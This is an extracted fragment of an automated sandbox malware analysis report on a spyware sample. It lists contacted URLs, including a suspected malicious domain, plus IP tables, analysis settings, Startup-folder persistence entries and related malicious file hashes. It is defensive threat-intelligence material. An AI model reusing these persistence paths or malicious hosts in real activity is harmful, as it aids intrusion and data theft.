googlehosted.l.googleusercontent.com | 142.250.185.129 | true | false | | high
clients2.googleusercontent.com | unknown | unknown | false | | high
bzib.nelreports.net | unknown | unknown | false | | high
assets.msn.com | unknown | unknown | false | | high
c.msn.com | unknown | unknown | false | | high
time.windows.com | unknown | unknown | false | | high
ntp.msn.com | unknown | unknown | false | | high
api.msn.com | unknown | unknown | false | | high
                                                                                                          http://www.softwareok.com/?Download=Find.Same.Images.OKLocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                            high
                                                                                                            http://e5.o.lencr.org0LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/common-settings-edgenext.2aca53164d1cd4b72160.LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKLocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://tataragirld.site/2009_New_England_Patriots_seasonLocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/PartlyCloudyLocalCtrl_alpha_v3.exe, 00000009.00000003.2033853901.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://ntp.msn.com/edge/ntp?locale=en-GB&title=NewLocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://nextdns.io/privacyLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.softwareok.de/?Download=Find.Same.Images.OKLocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://img.s-msn.com/tenant/amp/entityid/BB1msB1PLast-Modified:LocalCtrl_alpha_v3.exe, 00000009.00000003.2034926704.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://ntp.msn.comAccess-Control-Allow-Credentials:LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://nextdns.io/privacyrLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://assets.msn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://dns.quad9.net/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.ecosia.org/newtab/LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.symauth.com/cps0(AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://tataragirld.site/LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2182937317.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2143180060.0000000000686000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://tataragirld.site/g3LocalCtrl_alpha_v3.exe, 00000009.00000003.2170307750.0000000000686000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.334afafb1912a9f141aa.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.symauth.com/rpa00AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://assets.msn.com/bundles/v1/edgeChromium/latest/welcomeGreetingLight.d9ab3d372321b5935217.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.msn.com/web-notification-icon-light.pngLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2005803456.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007F73000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2059495533.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007F6F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.info-zip.org/AdobeSync.exe, 00000003.00000002.1393381948.000000000841D000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.000000000801C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.0000000004984000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.0000000002663000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://assets.msn.com/staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.jsonLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://assets.msn.com/bundles/v1/edgeChromium/latest/money-quote-vertical-watchlist.7e740a00da51bb7LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F6B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://tataragirld.site/2009_New_England_Patriots_seasonoLocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svg2045.47LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://ntp.msn.comcache-control:publicLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://ntp.msn.com/&lLocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007F21000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007F1F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://ecs.nel.measure.office.net/?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR30r4c&FrontEnd=AFLocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://alekberg.net/privacyLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://dnsnl.alekberg.net/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://appsyndication.org/2006/appsynLVkAi4PBv6.exefalse
                                                                                                                                                                        high
                                                                                                                                                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-placement-manager.a83c7cffbebd84e079LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://sn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          unknown
                                                                                                                                                                          https://assets.msn.com/staticsb/statics/latest/common/icons/copilot_color.svgLocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://chromium.dns.nextdns.ioLocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.e29eca8a01b21f77224b.jsfd03.jsLocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060104441.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2046391950.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.185.129 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false |
| 52.168.117.171 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 23.57.90.139 | unknown | United States | 35994 | AKAMAI-ASUS | false |
| 23.219.82.59 | unknown | United States | 20940 | AKAMAI-ASN1EU | false |
| 18.164.96.90 | unknown | United States | 3 | MIT-GATEWAYSUS | false |
| 162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false |
| 23.57.90.169 | unknown | United States | 35994 | AKAMAI-ASUS | false |
| 18.244.18.32 | sb.scorecardresearch.com | United States | 16509 | AMAZON-02US | false |
| 23.216.132.32 | unknown | United States | 7016 | CCCH-3US | false |
| 188.114.97.3 | tataragirld.site | European Union | 13335 | CLOUDFLARENETUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
                                                                                                                                                                                                        IP
                                                                                                                                                                                                        192.168.2.7
                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1585283
                                                                                                                                                                                                        Start date and time:2025-01-07 13:17:06 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 10m 6s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:30
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:LVkAi4PBv6.exe
                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                        Original Sample Name:dc1a25a3cecfd804e569a7238ba1ec7f.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.spyw.evad.winEXE@64/276@22/15
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 66.7%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 99%
                                                                                                                                                                                                        • Number of executed functions: 114
                                                                                                                                                                                                        • Number of non-executed functions: 277
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.101.57.9, 217.20.57.19, 204.79.197.203, 13.107.21.239, 204.79.197.239, 142.250.186.46, 13.107.42.16, 13.107.6.158, 4.231.68.226, 2.16.168.107, 2.16.168.113, 88.221.110.195, 88.221.110.179, 2.23.227.215, 2.23.227.202, 2.23.227.208, 2.23.227.221, 2.23.227.196, 2.23.227.216, 2.23.227.218, 2.23.227.197, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.21.65.154, 2.21.65.132, 108.141.15.7, 142.250.80.99, 142.250.72.99, 142.250.176.195, 13.107.246.45, 52.149.20.212, 184.28.90.27, 94.245.104.56, 40.126.31.67, 23.219.161.135, 20.25.227.174, 23.96.180.189, 13.107.246.40, 104.117.182.56
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, prod-agic-we-6.westeurope.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, prod-agic-we-8.westeurope.cloudapp.azure.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, twc.trafficmanager.net, arc.msn.com, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, config.edge.skype.com,
                                                                                                                                                                                                        • Execution Graph export aborted for target AdobeSync.exe, PID 6388 because there are no executed function
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 07:18:12 | API Interceptor | 1x Sleep call for process: LVkAi4PBv6.exe modified |
| 07:18:45 | API Interceptor | 1x Sleep call for process: cmd.exe modified |
| 07:18:47 | API Interceptor | 17x Sleep call for process: LocalCtrl_alpha_v3.exe modified |
| 13:18:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT8E5.tmp |
| 13:18:45 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk |
                                                                                                                                                                                                                                                                            • 23.44.136.141
                                                                                                                                                                                                                                                                            http://click.pstmrk.itGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 2.16.164.35
                                                                                                                                                                                                                                                                            https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 95.100.110.93
                                                                                                                                                                                                                                                                            momo.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 104.64.44.18
                                                                                                                                                                                                                                                                            z0r0.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 204.237.205.107
                                                                                                                                                                                                                                                                            17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                            • 104.117.182.56
                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.209.72.41
                                                                                                                                                                                                                                                                            https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 2.16.168.12
                                                                                                                                                                                                                                                                            MIT-GATEWAYSUSSales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.173.205.117
                                                                                                                                                                                                                                                                            https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.122.120
                                                                                                                                                                                                                                                                            https://d3sdeiz39xdvhy.cloudfront.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.102.106
                                                                                                                                                                                                                                                                            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.112.27
                                                                                                                                                                                                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.112.128
                                                                                                                                                                                                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.112.109
                                                                                                                                                                                                                                                                            miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.43.155.129
